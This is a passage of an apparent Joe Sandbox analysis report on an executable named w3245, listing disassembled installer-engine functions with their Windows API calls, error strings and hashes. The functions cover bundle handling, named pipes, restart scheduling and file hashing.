                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$CreateKnownSecurityWell$Descriptor$Initialize$DaclEntriesFreeGroupLocalOwner
                                                                                                                                                              • String ID: srputil.cpp
                                                                                                                                                              • API String ID: 267631441-4105181634
                                                                                                                                                              • Opcode ID: cdb2e9fb0c53a82a82da40ff3004da5bd505eaa4232237adc58167d1a8d3afff
                                                                                                                                                              • Instruction ID: 61fb5bf3e54437a8e6abe056adcd4db39bd4c2854bf1aa3a6a39c31138fb89ad
                                                                                                                                                              • Opcode Fuzzy Hash: cdb2e9fb0c53a82a82da40ff3004da5bd505eaa4232237adc58167d1a8d3afff
                                                                                                                                                              • Instruction Fuzzy Hash: 4CC14576D4123DABDB718B968C49BDFFAB8FF44750F0141AAA905F7240E7749E408EA0
                                                                                                                                                              Function 007EC332 Relevance: 37.1, APIs: 1, Strings: 20, Instructions: 376COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to allocate memory for pseudo bundle payload hash., xrefs: 007EC4AD
                                                                                                                                                              • Failed to copy install arguments for related bundle package, xrefs: 007EC584
                                                                                                                                                              • Failed to copy uninstall arguments for related bundle package, xrefs: 007EC623
                                                                                                                                                              • Failed to copy filename for pseudo bundle., xrefs: 007EC417
                                                                                                                                                              • Failed to append relation type to install arguments for related bundle package, xrefs: 007EC5A9
                                                                                                                                                              • Failed to copy display name for pseudo bundle., xrefs: 007EC74F
                                                                                                                                                              • Failed to allocate memory for dependency providers., xrefs: 007EC6DE
                                                                                                                                                              • Failed to copy download source for pseudo bundle., xrefs: 007EC469
                                                                                                                                                              • Failed to copy local source path for pseudo bundle., xrefs: 007EC43B
                                                                                                                                                              • Failed to copy version for pseudo bundle., xrefs: 007EC72D
                                                                                                                                                              • pseudobundle.cpp, xrefs: 007EC379, 007EC3B2, 007EC4A1, 007EC6D2
                                                                                                                                                              • Failed to copy key for pseudo bundle., xrefs: 007EC542
                                                                                                                                                              • Failed to append relation type to repair arguments for related bundle package, xrefs: 007EC5F1
                                                                                                                                                              • Failed to copy key for pseudo bundle payload., xrefs: 007EC3F3
                                                                                                                                                              • Failed to allocate space for burn payload inside of related bundle struct, xrefs: 007EC3BE
                                                                                                                                                              • Failed to copy repair arguments for related bundle package, xrefs: 007EC5D0
                                                                                                                                                              • Failed to copy cache id for pseudo bundle., xrefs: 007EC55F
                                                                                                                                                              • Failed to append relation type to uninstall arguments for related bundle package, xrefs: 007EC644
                                                                                                                                                              • -%ls, xrefs: 007EC34C
                                                                                                                                                              • Failed to allocate space for burn package payload inside of related bundle struct, xrefs: 007EC385
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$AllocateProcess
                                                                                                                                                              • String ID: -%ls$Failed to allocate memory for dependency providers.$Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of related bundle struct$Failed to allocate space for burn payload inside of related bundle struct$Failed to append relation type to install arguments for related bundle package$Failed to append relation type to repair arguments for related bundle package$Failed to append relation type to uninstall arguments for related bundle package$Failed to copy cache id for pseudo bundle.$Failed to copy display name for pseudo bundle.$Failed to copy download source for pseudo bundle.$Failed to copy filename for pseudo bundle.$Failed to copy install arguments for related bundle package$Failed to copy key for pseudo bundle payload.$Failed to copy key for pseudo bundle.$Failed to copy local source path for pseudo bundle.$Failed to copy repair arguments for related bundle package$Failed to copy uninstall arguments for related bundle package$Failed to copy version for pseudo bundle.$pseudobundle.cpp
                                                                                                                                                              • API String ID: 1357844191-2832335422
                                                                                                                                                              • Opcode ID: c6f5bbd432482de4e51bd2a2200e552b950ff31d52a563b4a3379fda57b6ec8a
                                                                                                                                                              • Instruction ID: a9cbc8b81c85b9bcd784aedf7269f227be32fd247f51c5929543ba872a1730e5
                                                                                                                                                              • Opcode Fuzzy Hash: c6f5bbd432482de4e51bd2a2200e552b950ff31d52a563b4a3379fda57b6ec8a
                                                                                                                                                              • Instruction Fuzzy Hash: 46C11035601696EBCB169F29C885F6A77A9FF0C310B104129FE15EB342DB78EC529BD0
                                                                                                                                                              Function 007C45EE Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 141sleepshutdownCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000020,?,00000001,00000000,?,?,?,?,?,?,?), ref: 007C4617
                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 007C461E
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 007C4628
                                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 007C4678
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C4682
                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 007C46C6
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C46D0
                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 007C470C
                                                                                                                                                              • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000001,80040002), ref: 007C471D
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C4727
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 007C477D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$ProcessToken$AdjustCloseCurrentHandleInitiateLookupOpenPrivilegePrivilegesShutdownSleepSystemValue
                                                                                                                                                              • String ID: Failed to adjust token to add shutdown privileges.$Failed to get process token.$Failed to get shutdown privilege LUID.$Failed to schedule restart.$SeShutdownPrivilege$engine.cpp
                                                                                                                                                              • API String ID: 2241679041-1583736410
                                                                                                                                                              • Opcode ID: 0f786fc47a8bb6db6370159088fc4b256bf918525ed271717e1ac42d4ad8fd33
                                                                                                                                                              • Instruction ID: 4aba72cf7df3d643358271893415d025e2ed08e88a75d4da21c0d98c7407e4d3
                                                                                                                                                              • Opcode Fuzzy Hash: 0f786fc47a8bb6db6370159088fc4b256bf918525ed271717e1ac42d4ad8fd33
                                                                                                                                                              • Instruction Fuzzy Hash: 6941D773A40626ABD7209BA58D5AF6F7B68FB01760F11412DFE11F6380E76D8C0086E1
                                                                                                                                                              Function 007D4EDF Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 165pipeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD),00000001,?,00000000), ref: 007D4F0D
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,?,?,007C452F,?), ref: 007D4F16
                                                                                                                                                              • CreateNamedPipeW.KERNEL32(000000FF,00080003,00000000,00000001,00010000,00010000,00000001,?,?,00000000,?,?,007C452F,?), ref: 007D4FB8
                                                                                                                                                              • GetLastError.KERNEL32(?,007C452F,?), ref: 007D4FC5
                                                                                                                                                              • CreateNamedPipeW.KERNEL32(000000FF,00080003,00000000,00000001,00010000,00010000,00000001,00000000,?,?,?,?,?,?,?,007C452F), ref: 007D5040
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,007C452F,?), ref: 007D504B
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,pipe.cpp,00000132,00000000,?,?,?,?,?,?,?,007C452F,?), ref: 007D508B
                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,007C452F,?), ref: 007D50B9
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to allocate full name of cache pipe: %ls, xrefs: 007D5022
                                                                                                                                                              • \\.\pipe\%ls.Cache, xrefs: 007D500C
                                                                                                                                                              • D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD), xrefs: 007D4F08
                                                                                                                                                              • \\.\pipe\%ls, xrefs: 007D4F6E
                                                                                                                                                              • Failed to allocate full name of pipe: %ls, xrefs: 007D4F84
                                                                                                                                                              • Failed to create pipe: %ls, xrefs: 007D4FF6, 007D507C
                                                                                                                                                              • Failed to create the security descriptor for the connection event and pipe., xrefs: 007D4F44
                                                                                                                                                              • pipe.cpp, xrefs: 007D4F3A, 007D4FE9, 007D506F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$CreateDescriptorNamedPipeSecurity$CloseConvertFreeHandleLocalString
                                                                                                                                                              • String ID: D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD)$Failed to allocate full name of cache pipe: %ls$Failed to allocate full name of pipe: %ls$Failed to create pipe: %ls$Failed to create the security descriptor for the connection event and pipe.$\\.\pipe\%ls$\\.\pipe\%ls.Cache$pipe.cpp
                                                                                                                                                              • API String ID: 1214480349-3253666091
                                                                                                                                                              • Opcode ID: 5c3471848d6e63023e61fa3254ac463ed107fb8d9d69d35b9fe08a87098219d8
                                                                                                                                                              • Instruction ID: 58a16d18962a4b949aa3baa43df168ec44f96d7c1bf27ec9e9b07b82be4b04b3
                                                                                                                                                              • Opcode Fuzzy Hash: 5c3471848d6e63023e61fa3254ac463ed107fb8d9d69d35b9fe08a87098219d8
                                                                                                                                                              • Instruction Fuzzy Hash: EE517072941625BBDB219BA4CC46F9EBB78FF04720F150126F910F6390D3B95A809AE1
                                                                                                                                                              Function 007FFA62 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 173encryptionfileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000003,F0000040,00000003,00000000,00000000,007D9F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0), ref: 007FFAC7
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007FFAD1
                                                                                                                                                              • CryptCreateHash.ADVAPI32(?,?,00000000,00000000,?), ref: 007FFB0E
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007FFB18
                                                                                                                                                              • CryptHashData.ADVAPI32(?,?,?,00000000), ref: 007FFB5F
                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,00001000,?,00000000), ref: 007FFB83
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007FFB8D
                                                                                                                                                              • CryptDestroyHash.ADVAPI32(00000000), ref: 007FFBCA
                                                                                                                                                              • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 007FFBE1
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007FFBFC
                                                                                                                                                              • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 007FFC34
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007FFC3E
                                                                                                                                                              • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00008004,00000001), ref: 007FFC77
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007FFC85
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CryptErrorLast$Hash$ContextFile$AcquireCreateDataDestroyParamPointerReadRelease
                                                                                                                                                              • String ID: cryputil.cpp
                                                                                                                                                              • API String ID: 3955742341-2185294990
                                                                                                                                                              • Opcode ID: 9128cf1f927841c1e7fdd2491f71cdc49ea71541e6eea92863b47b2282e298aa
                                                                                                                                                              • Instruction ID: aac9ab0441f126225b3887f41ad646103c5afba8880524ec448bd9e82bc31b86
                                                                                                                                                              • Opcode Fuzzy Hash: 9128cf1f927841c1e7fdd2491f71cdc49ea71541e6eea92863b47b2282e298aa
                                                                                                                                                              • Instruction Fuzzy Hash: 2851B376D4013DABE7318A658C14BEB7A64BF04751F0140B5FF48F6380EB788D809AE4
                                                                                                                                                              Function 007D9E9E Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 181COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to get cached path for package with cache id: %ls, xrefs: 007D9EC8
                                                                                                                                                              • Failed to transfer working path to unverified path for payload: %ls., xrefs: 007D9FA4
                                                                                                                                                              • Failed to move verified file to complete payload path: %ls, xrefs: 007DA06C
                                                                                                                                                              • Failed to reset permissions on unverified cached payload: %ls, xrefs: 007D9FF1
                                                                                                                                                              • moving, xrefs: 007DA029
                                                                                                                                                              • Failed to concat complete cached path., xrefs: 007D9EF4
                                                                                                                                                              • Failed to create unverified path., xrefs: 007D9F6E
                                                                                                                                                              • copying, xrefs: 007DA030, 007DA038
                                                                                                                                                              • Failed to find payload: %ls in working path: %ls and unverified path: %ls, xrefs: 007D9FCB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Failed to concat complete cached path.$Failed to create unverified path.$Failed to find payload: %ls in working path: %ls and unverified path: %ls$Failed to get cached path for package with cache id: %ls$Failed to move verified file to complete payload path: %ls$Failed to reset permissions on unverified cached payload: %ls$Failed to transfer working path to unverified path for payload: %ls.$copying$moving
                                                                                                                                                              • API String ID: 0-1289240508
                                                                                                                                                              • Opcode ID: 4163cc3fbf7f5debf91b375aeed4f3467d9c6a4df53ac9b4d9d387220fe995e1
                                                                                                                                                              • Instruction ID: da6cad0a2f07ed31b5619d0d8fb5f2f5c993ead5975dc8970693e1e6eb47450c
                                                                                                                                                              • Opcode Fuzzy Hash: 4163cc3fbf7f5debf91b375aeed4f3467d9c6a4df53ac9b4d9d387220fe995e1
                                                                                                                                                              • Instruction Fuzzy Hash: 67516032944119FADF236BA4CD06FED7B75FF14710F140052FA10B52A1E77A9EA0AB86
                                                                                                                                                              Function 007C62AA Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 144COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetVersionExW.KERNEL32(0000011C), ref: 007C62F8
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C6302
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLastVersion
                                                                                                                                                              • String ID: Failed to get OS info.$Failed to set variant value.$variable.cpp
                                                                                                                                                              • API String ID: 305913169-1971907631
                                                                                                                                                              • Opcode ID: 84cd44e26165c7e34fdf68ff7e93d4be728e37e2df7a42fa03859fdbde41d57e
                                                                                                                                                              • Instruction ID: 5046231407a76f679c50b49ded270dd7289c277122e688237f9b2698013eab0d
                                                                                                                                                              • Opcode Fuzzy Hash: 84cd44e26165c7e34fdf68ff7e93d4be728e37e2df7a42fa03859fdbde41d57e
                                                                                                                                                              • Instruction Fuzzy Hash: 1741A871A01268ABDB209B59CC89FEF7BB8EB86750F10019EF545E7281D7389E41CB91
                                                                                                                                                              Function 007C6037 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 107timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetSystemTime.KERNEL32(?), ref: 007C6062
                                                                                                                                                              • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,00000000,00000000), ref: 007C6076
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C6088
                                                                                                                                                              • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,?,00000000,?,00000000), ref: 007C60DC
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C60E6
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to allocate the buffer for the Date., xrefs: 007C60C4
                                                                                                                                                              • Failed to get the required buffer length for the Date., xrefs: 007C60AD
                                                                                                                                                              • Failed to get the Date., xrefs: 007C610B
                                                                                                                                                              • variable.cpp, xrefs: 007C60A3, 007C6101
                                                                                                                                                              • Failed to set variant value., xrefs: 007C6124
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DateErrorFormatLast$SystemTime
                                                                                                                                                              • String ID: Failed to allocate the buffer for the Date.$Failed to get the Date.$Failed to get the required buffer length for the Date.$Failed to set variant value.$variable.cpp
                                                                                                                                                              • API String ID: 2700948981-3682088697
                                                                                                                                                              • Opcode ID: 2799a66b5e8c00ceb5887b0672abdcc26d42105f24e33e2db813b036eab9d5ad
                                                                                                                                                              • Instruction ID: ab6da63c0d9b8cbf8a489110aaab55a20ce8e587269d9b7257e920f5d5ef9cbe
                                                                                                                                                              • Opcode Fuzzy Hash: 2799a66b5e8c00ceb5887b0672abdcc26d42105f24e33e2db813b036eab9d5ad
                                                                                                                                                              • Instruction Fuzzy Hash: CB319972A40629ABDB219BE9CC86FAF7BA4FB04711F11012DFE00F7281D6699D4146E1
                                                                                                                                                              Function 007FFEC6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132threadtimeCOMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • EnterCriticalSection.KERNEL32(0082B5FC,00000000,?,?,?,?,007E12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 007FFEF4
                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000000,?,007E12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 007FFF04
                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 007FFF0D
                                                                                                                                                              • GetLocalTime.KERNEL32(8007139F,?,007E12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 007FFF23
                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0082B5FC,007E12CF,?,00000000,0000FDE9,?,007E12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 0080001A
                                                                                                                                                              Strings
                                                                                                                                                              • %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 007FFFC0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
                                                                                                                                                              • String ID: %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls
                                                                                                                                                              • API String ID: 296830338-59366893
                                                                                                                                                              • Opcode ID: dd63ddd6dd7f2060999fdb15af5b8661f07b26e1818ed39a0ca832219155958c
                                                                                                                                                              • Instruction ID: 9e6eb8aeac83f3a011d6550277bfa1d4625052ab9a1ff41855192fc33bb82fcb
                                                                                                                                                              • Opcode Fuzzy Hash: dd63ddd6dd7f2060999fdb15af5b8661f07b26e1818ed39a0ca832219155958c
                                                                                                                                                              • Instruction Fuzzy Hash: 6A418E72D01219EBDB619FA4DC05BBEB7B9FF08B11F104025FA00E6290DB388D81DBA1
                                                                                                                                                              Function 007D9B43 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108filestringCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,00000000,?,*.*,?,?,?,00000000,.unverified,?), ref: 007D9BF2
                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 007D9C19
                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 007D9C79
                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 007D9C84
                                                                                                                                                                • Part of subcall function 007C3CC4: GetFileAttributesW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 007C3D40
                                                                                                                                                                • Part of subcall function 007C3CC4: GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 007C3D53
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileFind$AttributesCloseErrorFirstLastNextlstrlen
                                                                                                                                                              • String ID: *.*$.unverified
                                                                                                                                                              • API String ID: 457978746-2528915496
                                                                                                                                                              • Opcode ID: 1b758f35a0c33d1ebfeebf8c4e54777197640e8f82fe7a4b12cf5a979cb0efeb
                                                                                                                                                              • Instruction ID: e691059e262b4298b5ee6c8b6c1e9f7b05178d63544fcab8c445a7f0b60771d2
                                                                                                                                                              • Opcode Fuzzy Hash: 1b758f35a0c33d1ebfeebf8c4e54777197640e8f82fe7a4b12cf5a979cb0efeb
                                                                                                                                                              • Instruction Fuzzy Hash: AB41763191052CAECB61AB74DD4DBEAB7B8FF44301F5001A6E908E11A0EB799EC4DF64
                                                                                                                                                              Function 0080887B Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 77timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,00000001,00000000), ref: 008088D0
                                                                                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?), ref: 008088E2
                                                                                                                                                              Strings
                                                                                                                                                              • %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u, xrefs: 0080892D
                                                                                                                                                              • feclient.dll, xrefs: 008088AA
                                                                                                                                                              • %04hu-%02hu-%02huT%02hu:%02hu:%02huZ, xrefs: 008088B9
                                                                                                                                                              • crypt32.dll, xrefs: 008088A0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Time$InformationLocalSpecificSystemZone
                                                                                                                                                              • String ID: %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u$%04hu-%02hu-%02huT%02hu:%02hu:%02huZ$crypt32.dll$feclient.dll
                                                                                                                                                              • API String ID: 1772835396-1985132828
